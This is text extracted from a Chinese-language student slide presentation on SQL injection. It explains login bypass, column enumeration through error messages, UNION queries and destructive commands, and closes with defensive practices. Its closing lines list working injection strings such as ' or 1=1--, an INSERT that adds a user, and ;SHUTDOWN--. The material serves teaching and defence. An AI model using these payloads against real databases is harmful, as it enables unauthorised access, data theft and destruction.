sql injection (资料隐码).ppt

SQL Injection (資料隱碼) 學生：a0933333 吳倩瑜 指導教授：梁明章 介紹 竊取資料或破壞電子商務網站 用SQL語言所撰寫程式碼來存取或查詢資料庫內所存放之資料 利用輸入特殊命令，讓系統將之與標準的資料庫查詢程式和資料合併在一起，送給資料庫管理系統執行 針對與客戶互動的程式尤其是會對資料庫進行存取或查詢的程式碼 攻擊模式 利用特殊指令攻擊 利用系統的錯誤訊息找出資料庫弱點 攻擊模式-剪接語法 攻擊模式-剪接語法 利用任何已知的使用者名稱登入 在需要輸入使用者名稱的地方鍵入Admin’-- 攻擊模式-剪接語法 用未知的使用者名稱登入 若沒有已知的帳號，也可以用以上的方式輸入到使用者名稱欄位 攻擊模式-利用錯誤訊息 獲取欄位數量與名稱 在使用者名稱欄位輸入： HAVING 1=1-- 攻擊模式-利用錯誤訊息 約略估計資料表的欄位結構 攻擊模式-利用錯誤訊息 獲取欄位資料型態 若有資料欄位格式不對，導致無法加入自訂使用者 在使用者名稱欄位輸入： 攻擊模式-使用具破壞力的語法 停掉 SQL Server 的執行 破壞內容 刪除資料庫內某個資料表 清空某個資料表 DELETE 清空資料表 如何避免 加強程式上的安全檢查措施 妥善使用權限管理 保持良好的程式開發習慣 將核心程式碼隱藏起來 以標準的訊息回覆給客戶 刪除多餘的資料表 * * SELECT * FROM tblUser WHERE UserName=admin SELECT * FROM tblUser WHERE UserName=admin-- AND Password=asdf ‘ or 1=1- - SELECT * FROM tblUser WHERE UserName= or 1=1-- AND Password=asdf ;INSERT INTO tblUser Values(hacker,hacker,10)-- GROUP BY UserID,UserName HAVING 1=1-- GROUP BY UserID HAVING 1=1-- GROUP BY UserID,UserName,Password,Pri HAVING 1=1-- UNION SELECT abc,1,1,1 FROM tblUser -- ;SHUTDOWN--